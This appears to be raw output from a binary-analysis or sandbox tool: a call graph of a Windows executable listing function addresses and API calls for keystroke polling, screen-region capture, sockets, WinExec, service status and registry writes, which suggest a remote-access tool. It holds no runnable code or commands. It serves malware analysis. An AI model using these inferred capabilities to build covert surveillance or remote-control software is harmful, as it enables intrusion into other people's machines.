7ff7d5957da7 21916->21918 21916->21921 21917->21908 21919 7ff7d5933730 _RunAllParam 89 API calls 21918->21919 21919->21921 21923 7ff7d5933730 _RunAllParam 89 API calls 21921->21923 21922->21908 21924 7ff7d5957dfc GetModuleFileNameA 21923->21924 21928 7ff7d5957e15 21924->21928 21929 7ff7d5957e56 LoadLibraryA 21924->21929 21926->21908 22111 7ff7d59ea140 70 API calls 3 library calls 21928->22111 21932 7ff7d5957e6b GetProcAddress 21929->21932 21933 7ff7d5957e9d 21929->21933 21939 7ff7d5957e8f FreeLibrary 21932->21939 21949 7ff7d5957edd 21933->21949 22112 7ff7d594e580 97 API calls _RunAllParam 21933->22112 21934 7ff7d5957c54 21938 7ff7d5933730 _RunAllParam 89 API calls 21934->21938 21935 7ff7d5957e26 21935->21929 21936->21908 21937->21908 21938->21940 21939->21933 21940->21901 21940->21902 21943->21908 21945->21934 21945->21940 21947->21908 21950 7ff7d5957fb2 21949->21950 21952 7ff7d5933730 _RunAllParam 89 API calls 21949->21952 22114 7ff7d59e7220 21950->22114 21954 7ff7d5957f3e 21952->21954 21953 7ff7d5957ff0 22113 7ff7d599ab00 95 API calls _RunAllParam 21954->22113 21957 7ff7d5933730 _RunAllParam 89 API calls 21956->21957 21958 7ff7d598068e 21957->21958 21959 7ff7d59809af VkKeyScanA 21958->21959 21962 7ff7d5933730 _RunAllParam 89 API calls 21958->21962 21963 7ff7d598102e 21958->21963 21960 7ff7d59809c2 21959->21960 21961 7ff7d5933730 _RunAllParam 89 API calls 21960->21961 21964 7ff7d5980a08 21961->21964 21965 7ff7d5980743 21962->21965 21966 7ff7d598109a 21963->21966 21967 7ff7d5933730 _RunAllParam 89 API calls 21963->21967 21968 7ff7d5980d54 GetKeyState 21964->21968 21969 7ff7d5980a13 21964->21969 21971 7ff7d5933730 _RunAllParam 89 API calls 21965->21971 21974 7ff7d59810ee 21966->21974 22159 7ff7d5982ef0 81 API calls 21966->22159 21967->21966 21972 7ff7d5980d71 21968->21972 21970 7ff7d5980d0a 21969->21970 21973 7ff7d5933730 _RunAllParam 89 API calls 21969->21973 21970->21897 21971->21959 21976 7ff7d5980dbf 21972->21976 22063 7ff7d5980eaa 21972->22063 21978 7ff7d5980a33 21973->21978 22125 7ff7d5981620 21974->22125 21981 7ff7d5980e0a 21976->21981 21982 7ff7d5980dc9 GetAsyncKeyState 21976->21982 21985 7ff7d5933730 _RunAllParam 89 API calls 21978->21985 21979 7ff7d5933730 _RunAllParam 89 API calls 21988 7ff7d5980fe2 MapVirtualKeyA 21979->21988 21980 7ff7d59810df 22160 7ff7d5982370 71 API calls 21980->22160 21986 7ff7d5980e58 21981->21986 21987 7ff7d5980e14 GetAsyncKeyState 21981->21987 21982->21981 21983 7ff7d5980dd8 MapVirtualKeyA 21982->21983 22148 7ff7d59474c0 18 API calls 21983->22148 21984 7ff7d5981108 22000 7ff7d598115f GetAsyncKeyState 21984->22000 22019 7ff7d598111e 21984->22019 21991 7ff7d5980a4b 21985->21991 21994 7ff7d5980eb3 21986->21994 21995 7ff7d5980e62 GetAsyncKeyState 21986->21995 21987->21986 21992 7ff7d5980e24 MapVirtualKeyA 21987->21992 22154 7ff7d59474c0 18 API calls 21988->22154 21997 7ff7d5980a58 21991->21997 21998 7ff7d5980d37 21991->21998 22149 7ff7d59474c0 18 API calls 21992->22149 22005 7ff7d5980f17 GetAsyncKeyState 21994->22005 22006 7ff7d5980ec6 GetAsyncKeyState 21994->22006 21994->22063 22002 7ff7d5980e76 MapVirtualKeyA 21995->22002 21995->22063 21996 7ff7d5980def 22003 7ff7d5933730 _RunAllParam 89 API calls 21996->22003 22007 7ff7d5980b27 GetAsyncKeyState 21997->22007 22008 7ff7d5980ad4 GetAsyncKeyState 21997->22008 22009 7ff7d5933730 _RunAllParam 89 API calls 21998->22009 22011 7ff7d5981174 GetAsyncKeyState 22000->22011 22000->22019 22001 7ff7d5981001 22155 7ff7d59802a0 109 API calls _RunAllParam 22001->22155 22150 7ff7d59474c0 18 API calls 22002->22150 22003->21981 22004 7ff7d598124d MapVirtualKeyA 22162 7ff7d59474c0 18 API calls 22004->22162 22024 7ff7d5980f27 MapVirtualKeyA 22005->22024 22025 7ff7d5980f62 GetAsyncKeyState 22005->22025 22020 7ff7d5980eda MapVirtualKeyA 22006->22020 22006->22063 22014 7ff7d5980b3c MapVirtualKeyA 22007->22014 22015 7ff7d5980b77 GetAsyncKeyState 22007->22015 22021 7ff7d5980aec MapVirtualKeyA 22008->22021 22067 7ff7d5980b1e 22008->22067 22009->21970 22010 7ff7d5980e3b 22022 7ff7d5933730 _RunAllParam 89 API calls 22010->22022 22011->22019 22023 7ff7d5981184 22011->22023 22133 7ff7d59474c0 18 API calls 22014->22133 22033 7ff7d5980b87 MapVirtualKeyA 22015->22033 22015->22067 22016 7ff7d5980e8d 22031 7ff7d5933730 _RunAllParam 89 API calls 22016->22031 22018 7ff7d5981151 22018->22004 22019->22004 22019->22018 22151 7ff7d59474c0 18 API calls 22020->22151 22132 7ff7d59474c0 18 API calls 22021->22132 22022->21986 22023->22019 22044 7ff7d5933730 _RunAllParam 89 API calls 22023->22044 22152 7ff7d59474c0 18 API calls 22024->22152 22027 7ff7d5980f72 MapVirtualKeyA 22025->22027 22025->22063 22026 7ff7d598100a 22156 7ff7d59802a0 109 API calls _RunAllParam 22026->22156 22153 7ff7d59474c0 18 API calls 22027->22153 22031->22063 22032 7ff7d5981267 22032->22032 22134 7ff7d59474c0 18 API calls 22033->22134 22035 7ff7d5933730 _RunAllParam 89 API calls 22043 7ff7d5980bf1 MapVirtualKeyA 22035->22043 22038 7ff7d5980b03 22047 7ff7d5933730 _RunAllParam 89 API calls 22038->22047 22039 7ff7d5981013 22157 7ff7d59802a0 109 API calls _RunAllParam 22039->22157 22040 7ff7d5980b55 22049 7ff7d5933730 _RunAllParam 89 API calls 22040->22049 22042 7ff7d5980ef1 22051 7ff7d5933730 _RunAllParam 89 API calls 22042->22051 22135 7ff7d59474c0 18 API calls 22043->22135 22053 7ff7d59811a5 22044->22053 22045 7ff7d5980f40 22054 7ff7d5933730 _RunAllParam 89 API calls 22045->22054 22046 7ff7d5980f8b 22056 7ff7d5933730 _RunAllParam 89 API calls 22046->22056 22047->22067 22058 7ff7d5980b73 22049->22058 22050 7ff7d5980ba0 22059 7ff7d5933730 _RunAllParam 89 API calls 22050->22059 22051->22063 22061 7ff7d59811ba 22053->22061 22064 7ff7d5981206 22053->22064 22055 7ff7d5980f5e 22054->22055 22055->22025 22056->22063 22057 7ff7d598101c 22158 7ff7d59802a0 109 API calls _RunAllParam 22057->22158 22058->22015 22059->22067 22060 7ff7d5980c08 MapVirtualKeyA 22136 7ff7d59474c0 18 API calls 22060->22136 22065 7ff7d59811fd 22061->22065 22069 7ff7d5933730 _RunAllParam 89 API calls 22061->22069 22063->21979 22064->22065 22070 7ff7d5933730 _RunAllParam 89 API calls 22064->22070 22075 7ff7d5933730 _RunAllParam 89 API calls 22065->22075 22067->22035 22068 7ff7d5980c1f MapVirtualKeyA 22137 7ff7d59474c0 18 API calls 22068->22137 22073 7ff7d59811ce CreateThread CloseHandle 22069->22073 22074 7ff7d598121a 22070->22074 22071 7ff7d5981025 22071->21963 22073->22065 22161 7ff7d599a910 116 API calls _RunAllParam 22074->22161 22078 7ff7d5981230 WinExec 22075->22078 22076 7ff7d5980c36 MapVirtualKeyA 22138 7ff7d59474c0 18 API calls 22076->22138 22078->22018 22080 7ff7d5980c53 MapVirtualKeyA 22139 7ff7d59474c0 18 API calls 22080->22139 22082 7ff7d5980c6c MapVirtualKeyA 22140 7ff7d59474c0 18 API calls 22082->22140 22084 7ff7d5980c89 MapVirtualKeyA 22141 7ff7d59474c0 18 API calls 22084->22141 22086 7ff7d5980ca2 MapVirtualKeyA 22142 7ff7d59474c0 18 API calls 22086->22142 22088 7ff7d5980cbf MapVirtualKeyA 22143 7ff7d59474c0 18 API calls 22088->22143 22090 7ff7d5980cd8 MapVirtualKeyA 22144 7ff7d59474c0 18 API calls 22090->22144 22092 7ff7d5980cef 22145 7ff7d59802a0 109 API calls _RunAllParam 22092->22145 22094 7ff7d5980cf8 22146 7ff7d59802a0 109 API calls _RunAllParam 22094->22146 22096 7ff7d5980d01 22147 7ff7d59802a0 109 API calls _RunAllParam 22096->22147 22098->21908 22100 7ff7d5933765 OpenInputDesktop 22099->22100 22101 7ff7d5933746 22099->22101 22100->21908 22100->21934 22101->22100 22284 7ff7d5983740 89 API calls 3 library calls 22101->22284 22103->21908 22105->21908 22106->21896 22107->21908 22108->21908 22109->21912 22111->21935 22113->21950 22116 7ff7d59e7229 22114->22116 22115 7ff7d59e7234 22115->21953 22116->22115 22117 7ff7d59f29e4 RtlCaptureContext RtlLookupFunctionEntry 22116->22117 22118 7ff7d59f2a69 22117->22118 22119 7ff7d59f2a28 RtlVirtualUnwind 22117->22119 22120 7ff7d59f2a8b IsDebuggerPresent 22118->22120 22119->22120 22285 7ff7d59fdc94 22120->22285 22122 7ff7d59f2aea SetUnhandledExceptionFilter UnhandledExceptionFilter 22123 7ff7d59f2b12 GetCurrentProcess TerminateProcess 22122->22123 22124 7ff7d59f2b08 _getdrive 22122->22124 22123->21953 22124->22123 22127 7ff7d598163b 22125->22127 22128 7ff7d5981665 22127->22128 22163 7ff7d5982f30 22127->22163 22128->21984 22131 7ff7d598169c 22131->21984 22132->22038 22133->22040 22134->22050 22135->22060 22136->22068 22137->22076 22138->22080 22139->22082 22140->22084 22141->22086 22142->22088 22143->22090 22144->22092 22145->22094 22146->22096 22147->21970 22148->21996 22149->22010 22150->22016 22151->22042 22152->22045 22153->22046 22154->22001 22155->22026 22156->22039 22157->22057 22158->22071 22159->21980 22160->21974 22161->22065 22162->22032 22167 7ff7d5982ff0 22163->22167 22165 7ff7d5981689 22166 7ff7d5982550 71 API calls 22165->22166 22166->22131 22195 7ff7d59e7978 22167->22195 22170 7ff7d5983008 22170->22165 22172 7ff7d5983043 22208 7ff7d59f2950 22172->22208 22174 7ff7d5983060 GetWindowLongPtrA 22175 7ff7d59830b9 22174->22175 22182 7ff7d5983140 22174->22182 22177 7ff7d59831ae SetWindowLongPtrA GetDlgItem 22175->22177 22180 7ff7d59830c5 22175->22180 22176 7ff7d5983265 EndDialog 22178 7ff7d59831a7 22176->22178 22179 7ff7d59831de SendMessageA GetDlgItem 22177->22179 22181 7ff7d59e7220 _getdrive 8 API calls 22178->22181 22184 7ff7d598320f SetForegroundWindow 22179->22184 22180->22178 22180->22182 22185 7ff7d598314a GetDlgItem SendMessageA 22180->22185 22186 7ff7d59830e4 22180->22186 22183 7ff7d598328a 22181->22183 22182->22176 22183->22165 22190 7ff7d598322e 22184->22190 22187 7ff7d598318f 22185->22187 22188 7ff7d5983174 SendMessageA 22185->22188 22186->22178 22189 7ff7d59830ef GetDlgItem SendMessageA 22186->22189 22187->22176 22188->22187 22189->22182 22191 7ff7d5983117 SendMessageA 22189->22191 22192 7ff7d598324d GetDlgItem EnableWindow 22190->22192 22193 7ff7d598323a GetDlgItem EnableWindow 22190->22193 22191->22182 22194 7ff7d5983132 22191->22194 22192->22178 22193->22178 22194->22182 22197 7ff7d59e7983 22195->22197 22198 7ff7d5983003 22197->22198 22202 7ff7d59e79a2 22197->22202 22211 7ff7d59f3238 DecodePointer 22197->22211 22213 7ff7d59e8c34 22197->22213 22198->22170 22207 7ff7d59e749c 70 API calls std::exception::operator= 22198->22207 22200 7ff7d59e79f3 22231 7ff7d59e755c 70 API calls std::exception::operator= 22200->22231 22202->22200 22230 7ff7d59e7b94 80 API calls 22202->22230 22203 7ff7d59e7a04 22205 7ff7d59f2950 RaiseException 22203->22205 22206 7ff7d59e7a1a 22205->22206 22207->22172 22209 7ff7d59f297e 22208->22209 22210 7ff7d59f29bd RaiseException 22209->22210 22210->22174 22212 7ff7d59f3253 22211->22212 22212->22197 22214 7ff7d59e8c4c 22213->22214 22215 7ff7d59e8cc8 22213->22215 22218 7ff7d59e8c84 HeapAlloc 22214->22218 22222 7ff7d59e8cad 22214->22222 22223 7ff7d59f3238 _callnewh DecodePointer 22214->22223 22226 7ff7d59e8cb2 22214->22226 22228 7ff7d59e8c64 22214->22228 22216 7ff7d59f3238 _callnewh DecodePointer 22215->22216 22217 7ff7d59e8ccd 22216->22217 22219 7ff7d59effc8 _errno 69 API calls 22217->22219 22218->22214 22220 7ff7d59e8cbd 22218->22220 22219->22220 22220->22197 22235 7ff7d59effc8 22222->22235 22223->22214 22229 7ff7d59effc8 _errno 69 API calls 22226->22229 22228->22218 22232 7ff7d59f2ed0 70 API calls 2 library calls 22228->22232 22233 7ff7d59f2c70 70 API calls 5 library calls 22228->22233 22234 7ff7d59eabd8 GetModuleHandleW GetProcAddress ExitProcess _amsg_exit 22228->22234 22229->22220 22230->22200 22231->22203 22232->22228 22233->22228 22238 7ff7d59f37c4 GetLastError FlsGetValue 22235->22238 22237 7ff7d59effd1 22237->22226 22239 7ff7d59f3832 SetLastError 22238->22239 22240 7ff7d59f37ea 22238->22240 22239->22237 22250 7ff7d59f32ec 22240->22250 22243 7ff7d59f37ff FlsSetValue 22244 7ff7d59f3815 22243->22244 22245 7ff7d59f382b 22243->22245 22255 7ff7d59f370c 22244->22255 22264 7ff7d59e8bf4 22245->22264 22248 7ff7d59f3830 22248->22239 22251 7ff7d59f3311 22250->22251 22253 7ff7d59f3351 22251->22253 22254 7ff7d59f332f Sleep 22251->22254 22270 7ff7d59f9234 22251->22270 22253->22239 22253->22243 22254->22251 22254->22253 22278 7ff7d59f77d0 22255->22278 22257 7ff7d59f3765 22258 7ff7d59f76d0 _wputenv LeaveCriticalSection 22257->22258 22259 7ff7d59f377a 22258->22259 22260 7ff7d59f77d0 _lock 70 API calls 22259->22260 22261 7ff7d59f3784 __doserrno 22260->22261 22262 7ff7d59f76d0 _wputenv LeaveCriticalSection 22261->22262 22263 7ff7d59f37b6 GetCurrentThreadId 22262->22263 22263->22239 22265 7ff7d59e8bf9 RtlFreeHeap 22264->22265 22269 7ff7d59e8c29 realloc 22264->22269 22266 7ff7d59e8c14 22265->22266 22265->22269 22267 7ff7d59effc8 _errno 68 API calls 22266->22267 22268 7ff7d59e8c19 GetLastError 22267->22268 22268->22269 22269->22248 22271 7ff7d59f9249 22270->22271 22276 7ff7d59f9266 22270->22276 22272 7ff7d59f9257 22271->22272 22271->22276 22274 7ff7d59effc8 _errno 69 API calls 22272->22274 22273 7ff7d59f927e HeapAlloc 22275 7ff7d59f925c 22273->22275 22273->22276 22274->22275 22275->22251 22276->22273 22276->22275 22277 7ff7d59f3238 _callnewh DecodePointer 22276->22277 22277->22276 22279 7ff7d59f77ff EnterCriticalSection 22278->22279 22280 7ff7d59f77ee 22278->22280 22281 7ff7d59f76e8 _lock 69 API calls 22280->22281 22282 7ff7d59f77f3 22281->22282 22282->22279 22283 7ff7d59eaf34 _amsg_exit 69 API calls 22282->22283 22283->22279 22284->22100 22285->22122 22525 7ff7d59580da 22544 7ff7d5940270 22525->22544 22527 7ff7d59581c6 22551 7ff7d59e92a4 22527->22551 22531 7ff7d5958211 LoadLibraryA 22532 7ff7d595825e 22531->22532 22533 7ff7d5958247 GetProcAddress 22531->22533 22534 7ff7d5933730 _RunAllParam 89 API calls 22532->22534 22533->22532 22535 7ff7d595828f 22534->22535 22536 7ff7d5933730 _RunAllParam 89 API calls 22535->22536 22537 7ff7d59582f7 22536->22537 22538 7ff7d59e7978 81 API calls 22537->22538 22539 7ff7d595831e 22538->22539 22540 7ff7d59e7978 81 API calls 22539->22540 22541 7ff7d5958454 22540->22541 22542 7ff7d5958469 22541->22542 22563 7ff7d5943fb0 22541->22563 22545 7ff7d59e92a4 __wtomb_environ 70 API calls 22544->22545 22546 7ff7d594028f CreateRectRgn 22545->22546 22547 7ff7d59e92a4 __wtomb_environ 70 API calls 22546->22547 22548 7ff7d59402b3 CreateRectRgn 22547->22548 22549 7ff7d59e92a4 __wtomb_environ 70 API calls 22548->22549 22550 7ff7d59402d7 CreateRectRgn 22549->22550 22550->22527 22552 7ff7d59e92bb std::exception::operator= 22551->22552 22558 7ff7d59581e7 CreateRectRgn 22551->22558 22553 7ff7d59e8c34 malloc 70 API calls 22552->22553 22554 7ff7d59e92cc 22553->22554 22554->22558 22571 7ff7d59e7de8 70 API calls 2 library calls 22554->22571 22556 7ff7d59e92e3 22557 7ff7d59e92ec 22556->22557 22556->22558 22572 7ff7d59f4930 16 API calls _invalid_parameter_noinfo 22557->22572 22561 7ff7d59321e0 22558->22561 22562 7ff7d5932259 22561->22562 22562->22531 22564 7ff7d5943fe1 _snprintf 22563->22564 22565 7ff7d594408b GetComputerNameA 22564->22565 22566 7ff7d59440d0 LoadLibraryA 22565->22566 22567 7ff7d59440a6 22565->22567 22568 7ff7d59440fd 22566->22568 22569 7ff7d59440e6 22566->22569 22567->22566 22568->22542 22573 7ff7d593a040 8 API calls 22569->22573 22571->22556 22573->22568 23076 7ff7d59356e0 DeleteCriticalSection DeleteCriticalSection FreeLibrary DeleteFileA 23077 7ff7d59608e0 117 API calls _RunAllParam 23079 7ff7d5961ae0 15 API calls _getdrive 23082 7ff7d595f6f0 10 API calls _getdrive 23083 7ff7d59590f0 EnterCriticalSection LeaveCriticalSection 23084 7ff7d595d0f0 DialogBoxParamA 23085 7ff7d594a6f0 GetWindowLongPtrA SetWindowLongPtrA SetDlgItemTextA SetForegroundWindow EndDialog 23088 7ff7d5954003 240 API calls 3 library calls 23089 7ff7d5954003 208 API calls 2 library calls 23090 7ff7d5965040 SetRectRgn CombineRgn DeleteObject 23091 7ff7d5961440 126 API calls _RunAllParam 23092 7ff7d5942a50 SetServiceStatus 23093 7ff7d5931450 RaiseException 23098 7ff7d593d820 8 API calls _RunAllParam 23099 7ff7d595a420 15 API calls _getdrive 23100 7ff7d5951620 150 API calls 5 library calls 23102 7ff7d59ec034 GetSystemTimeAsFileTime GetCurrentProcessId GetCurrentThreadId GetTickCount QueryPerformanceCounter 23103 7ff7d5954003 222 API calls 3 library calls 23104 7ff7d593a830 91 API calls 2 library calls 23107 7ff7d5963430 201 API calls 23108 7ff7d5995e80 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection 23111 7ff7d5942880 196 API calls 23112 7ff7d593d880 6 API calls _RunAllParam 23113 7ff7d595a085 98 API calls 23114 7ff7d5959480 117 API calls _RunAllParam 23117 7ff7d594a890 97 API calls 2 library calls 23121 7ff7d5933e60 34 API calls 23122 7ff7d5936060 112 API calls 2 library calls 23124 7ff7d5935a60 25 API calls 2 library calls 23125 7ff7d5959060 129 API calls 23127 7ff7d5965a60 8 API calls 23128 7ff7d5963460 122 API calls 2 library calls 23129 7ff7d5942a6e SetServiceStatus SetEvent SetEvent 23130 7ff7d5954003 236 API calls 2 library calls 23133 7ff7d5931a70 CloseClipboard 23135 7ff7d5958a70 133 API calls 4 library calls 22286 7ff7d599cbc0 22287 7ff7d599cbd7 22286->22287 22288 7ff7d599cbdc socket 22286->22288 22304 7ff7d599cc40 22287->22304 22290 7ff7d599cbf3 22288->22290 22291 7ff7d599cbfb setsockopt 22288->22291 22291->22290 22292 7ff7d599cc20 22291->22292 22295 7ff7d599cf90 setsockopt 22292->22295 22296 7ff7d599d08a getsockname getpeername 22295->22296 22297 7ff7d599cff9 setsockopt 22295->22297 22300 7ff7d599d109 SetPerTcpConnectionEStats 22296->22300 22301 7ff7d599d137 22296->22301 22298 7ff7d599d022 WSAIoctl 22297->22298 22299 7ff7d599d01d 22297->22299 22298->22296 22299->22296 22300->22301 22302 7ff7d59e7220 _getdrive 8 API calls 22301->22302 22303 7ff7d599cc28 22302->22303 22305 7ff7d599cc4f 22304->22305 22308 7ff7d599cc87 22304->22308 22306 7ff7d5933730 _RunAllParam 89 API calls 22305->22306 22307 7ff7d599cc67 shutdown closesocket 22306->22307 22307->22308 22308->22288 23137 7ff7d5954003 239 API calls 2 library calls 23138 7ff7d5954003 225 API calls 3 library calls 23140 7ff7d59355c0 LeaveCriticalSection 23141 7ff7d59347c0 12 API calls 23142 7ff7d59ee9bc 81 API calls 3 library calls 23146 7ff7d593f7d0 DeleteObject 23147 7ff7d5954003 198 API calls 2 library calls 23149 7ff7d5941bd0 FreeLibrary 23150 7ff7d59355d0 72 API calls sprintf 22891 7ff7d594f7d0 22892 7ff7d594f80d 22891->22892 22893 7ff7d594f803 22891->22893 22900 7ff7d59c7a70 6 API calls 22892->22900 22897 7ff7d59584f0 22893->22897 22901 7ff7d5958590 22897->22901 22902 7ff7d5933730 _RunAllParam 89 API calls 22901->22902 22903 7ff7d59585d2 22902->22903 22904 7ff7d5958628 22903->22904 22905 7ff7d59585eb SendMessageA WaitForSingleObject 22903->22905 22906 7ff7d5958612 22903->22906 22907 7ff7d5958656 22904->22907 22908 7ff7d59e8bf4 free 70 API calls 22904->22908 22905->22906 22906->22904 22931 7ff7d5944110 22906->22931 22909 7ff7d5933730 _RunAllParam 89 API calls 22907->22909 22918 7ff7d595867e _RunAllParam 22907->22918 22908->22907 22909->22918 22910 7ff7d5958757 22911 7ff7d5958768 22910->22911 22912 7ff7d59e8bf4 free 70 API calls 22910->22912 22913 7ff7d5958779 22911->22913 22914 7ff7d59e8bf4 free 70 API calls 22911->22914 22912->22911 22916 7ff7d59587b5 FreeLibrary 22913->22916 22921 7ff7d59587bc _RunAllParam 22913->22921 22914->22913 22916->22921 22917 7ff7d595873b 22917->22910 22919 7ff7d5958740 SendMessageA 22917->22919 22918->22910 22934 7ff7d599a220 FindWindowExA GetWindowThreadProcessId GetCurrentProcessId 22918->22934 22919->22910 22920 7ff7d59587ea DeleteObject 22922 7ff7d59e8bf4 free 70 API calls 22920->22922 22921->22920 22923 7ff7d595881c DeleteObject 22922->22923 22924 7ff7d59e8bf4 free 70 API calls 22923->22924 22925 7ff7d5958844 DeleteObject 22924->22925 22926 7ff7d59e8bf4 free 70 API calls 22925->22926 22927 7ff7d595885d DeleteObject 22926->22927 22928 7ff7d59e8bf4 free 70 API calls 22927->22928 22929 7ff7d5958876 22928->22929 22935 7ff7d5944140 22931->22935 22933 7ff7d5944124 22933->22904 22934->22917 22936 7ff7d594415c _RunAllParam 22935->22936 22937 7ff7d59441c6 22936->22937 22938 7ff7d59441b4 SendMessageA 22936->22938 22939 7ff7d59441cf FreeLibrary 22937->22939 22940 7ff7d59441d5 22937->22940 22938->22937 22939->22940 22940->22933 23151 7ff7d594b3d0 96 API calls 2 library calls 23152 7ff7d5954003 207 API calls 2 library calls 23153 7ff7d5987bd0 21 API calls _getdrive 23154 7ff7d5954003 244 API calls 3 library calls 23155 7ff7d59613a0 7 API calls 23156 7ff7d5949ba0 SetEvent Sleep Sleep 23159 7ff7d59381ad 272 API calls 2 library calls 23161 7ff7d593ffb0 SetRectRgn SetRectRgn SetRectRgn 23162 7ff7d595a9b0 114 API calls _getdrive 23163 7ff7d595ebb0 71 API calls 23165 7ff7d59505b0 168 API calls _RunAllParam 23168 7ff7d5940e00 82 API calls 3 library calls 23169 7ff7d593a600 100 API calls _RunAllParam 23172 7ff7d5931000 70 API calls free 23173 7ff7d5934200 121 API calls 2 library calls 23175 7ff7d5963600 9 API calls _getdrive 23176 7ff7d5965000 71 API calls free 23178 7ff7d5945203 16 API calls _getdrive 23182 7ff7d5940010 74 API calls free 23183 7ff7d5943210 18 API calls _getdrive 23185 7ff7d5944c10 137 API calls 3 library calls 22941 7ff7d594e610 22942 7ff7d59e92a4 __wtomb_environ 70 API calls 22941->22942 22943 7ff7d594e67f CreateRectRgn 22942->22943 22944 7ff7d59e92a4 __wtomb_environ 70 API calls 22943->22944 22945 7ff7d594e6a3 CreateRectRgn 22944->22945 22946 7ff7d59e92a4 __wtomb_environ 70 API calls 22945->22946 22947 7ff7d594e6c7 CreateRectRgn 22946->22947 22948 7ff7d5933730 _RunAllParam 89 API calls 22947->22948 23015 7ff7d594e70a _RunAllParam 22948->23015 22949 7ff7d594f70d 22950 7ff7d5933730 _RunAllParam 89 API calls 22949->22950 22951 7ff7d594f725 22950->22951 22953 7ff7d5933730 _RunAllParam 89 API calls 22951->22953 22952 7ff7d594e740 Sleep 23011 7ff7d594e752 22952->23011 22954 7ff7d594f741 DeleteObject 22953->22954 22956 7ff7d59e8bf4 free 70 API calls 22954->22956 22955 7ff7d594e773 EnterCriticalSection 22955->23015 22957 7ff7d594f760 DeleteObject 22956->22957 22958 7ff7d59e8bf4 free 70 API calls 22957->22958 22960 7ff7d594f773 DeleteObject 22958->22960 22959 7ff7d594eab4 DeleteObject 22961 7ff7d59e8bf4 free 70 API calls 22959->22961 22964 7ff7d59e8bf4 free 70 API calls 22960->22964 22961->23015 22962 7ff7d594ead7 DeleteObject 22965 7ff7d59e8bf4 free 70 API calls 22962->22965 22963 7ff7d594e8cb DeleteObject 22966 7ff7d59e8bf4 free 70 API calls 22963->22966 22970 7ff7d594f786 22964->22970 22965->23015 22966->23015 22967 7ff7d594eafa DeleteObject 22973 7ff7d59e8bf4 free 70 API calls 22967->22973 22968 7ff7d594e8ee DeleteObject 22974 7ff7d59e8bf4 free 70 API calls 22968->22974 22971 7ff7d59e7220 _getdrive 8 API calls 22970->22971 22977 7ff7d594f7a2 22971->22977 22973->23015 22974->23015 22975 7ff7d594e9a6 GetRgnBox 22975->23015 22976 7ff7d594e911 DeleteObject 22980 7ff7d59e8bf4 free 70 API calls 22976->22980 22978 7ff7d594e7e6 GetRgnBox 22978->23015 22979 7ff7d59c75c0 104 API calls 22979->23015 22980->23015 22981 7ff7d594f704 LeaveCriticalSection 22981->22949 22982 7ff7d59c7400 97 API calls 22982->23015 22984 7ff7d594e9f3 GetRgnBox 22984->23015 22986 7ff7d594e833 GetRgnBox 22986->23015 22987 7ff7d599d440 16 API calls 22987->23015 22988 7ff7d59e92a4 __wtomb_environ 70 API calls 22990 7ff7d594ebb3 CreateRectRgn CombineRgn 22988->22990 22998 7ff7d594ec05 22990->22998 22991 7ff7d594ea40 GetRgnBox 22991->23015 22993 7ff7d594f6b8 SetRectRgn 22996 7ff7d594f6da LeaveCriticalSection Sleep 22993->22996 22995 7ff7d594e87c GetRgnBox 22995->23015 22997 7ff7d594f702 22996->22997 22996->23015 22997->22949 23002 7ff7d594ec20 SetEvent 22998->23002 23024 7ff7d5958e00 120 API calls 22998->23024 22999 7ff7d59e92a4 __wtomb_environ 70 API calls 23000 7ff7d594efdf CreateRectRgn CombineRgn DeleteObject 22999->23000 23004 7ff7d59e8bf4 free 70 API calls 23000->23004 23001 7ff7d59e92a4 __wtomb_environ 70 API calls 23005 7ff7d594f120 CreateRectRgn CombineRgn DeleteObject 23001->23005 23002->22998 23003 7ff7d594f60b GetTickCount 23008 7ff7d599dd90 11 API calls 23003->23008 23004->23015 23010 7ff7d59e8bf4 free 70 API calls 23005->23010 23006 7ff7d599d710 15 API calls 23006->23015 23008->23011 23010->23015 23011->22952 23011->22993 23011->22996 23011->23015 23012 7ff7d594ec4a DeleteObject 23014 7ff7d59e8bf4 free 70 API calls 23012->23014 23013 7ff7d5933730 89 API calls _RunAllParam 23013->23015 23014->23015 23015->22949 23015->22952 23015->22955 23015->22959 23015->22962 23015->22963 23015->22967 23015->22968 23015->22976 23015->22979 23015->22981 23015->22982 23015->22987 23015->22988 23015->22993 23015->22999 23015->23001 23015->23003 23015->23006 23015->23011 23015->23013 23017 7ff7d599cc40 91 API calls 23015->23017 23018 7ff7d593f840 73 API calls __wtomb_environ 23015->23018 23019 7ff7d593f840 73 API calls __wtomb_environ 23015->23019 23020 7ff7d593f840 73 API calls __wtomb_environ 23015->23020 23021 7ff7d593f840 73 API calls __wtomb_environ 23015->23021 23022 7ff7d593f840 73 API calls __wtomb_environ 23015->23022 23023 7ff7d593f840 73 API calls __wtomb_environ 23015->23023 23025 7ff7d599d600 14 API calls 23015->23025 23026 7ff7d599ded0 8 API calls 2 library calls 23015->23026 23027 7ff7d595a580 99 API calls _RunAllParam 23015->23027 23017->23015 23018->22978 23019->22986 23020->22995 23021->22975 23022->22984 23023->22991 23024->23012 23025->23015 23026->23015 23027->23015 23187 7ff7d594da10 82 API calls 2 library calls 23188 7ff7d5987e10 20 API calls _getdrive 23192 7ff7d59409e0 82 API calls 2 library calls 23193 7ff7d5943be0 RegCreateKeyExA RegOpenKeyExA RegSetValueExA RegCloseKey RegCloseKey 23194 7ff7d59589e0 93 API calls _RunAllParam 23195 7ff7d594dde0 152 API calls 23196 7ff7d59379e9 75 API calls 3 library calls 23197 7ff7d59365f1 8 API calls _getdrive 23199 7ff7d59403f0 CombineRgn 23200 7ff7d595dbf0 13 API calls _RunAllParam 23201 7ff7d595ebf0 141 API calls 2 library calls 22309 7ff7d599cd40 inet_addr 22310 7ff7d599cd89 gethostbyname 22309->22310 22311 7ff7d599cdae htons connect 22309->22311 22312 7ff7d599cda1 22310->22312 22314 7ff7d599cd97 22310->22314 22311->22312 22313 7ff7d599cdd5 22311->22313 22316 7ff7d59e7220 _getdrive 8 API calls 22312->22316 22315 7ff7d599cf90 14 API calls 22313->22315 22314->22311 22314->22312 22315->22312 22317 7ff7d599cded 22316->22317 23202 7ff7d5954003 217 API calls 2 library calls 23204 7ff7d5966d40 165 API calls 4 library calls 23205 7ff7d5965940 109 API calls 23206 7ff7d5949740 101 API calls 2 library calls 23207 7ff7d594d149 96 API calls _RunAllParam 23208 7ff7d5943550 14 API calls _getdrive 23210 7ff7d593a550 104 API calls _RunAllParam 23211 7ff7d5943d50 12 API calls _getdrive 23212 7ff7d5945550 99 API calls 4 library calls 23214 7ff7d5959150 89 API calls _RunAllParam 23215 7ff7d595d150 177 API calls 3 library calls 23216 7ff7d594e550 97 API calls 23218 7ff7d5981550 110 API calls _RunAllParam 23219 7ff7d5936753 RegCloseKey 23221 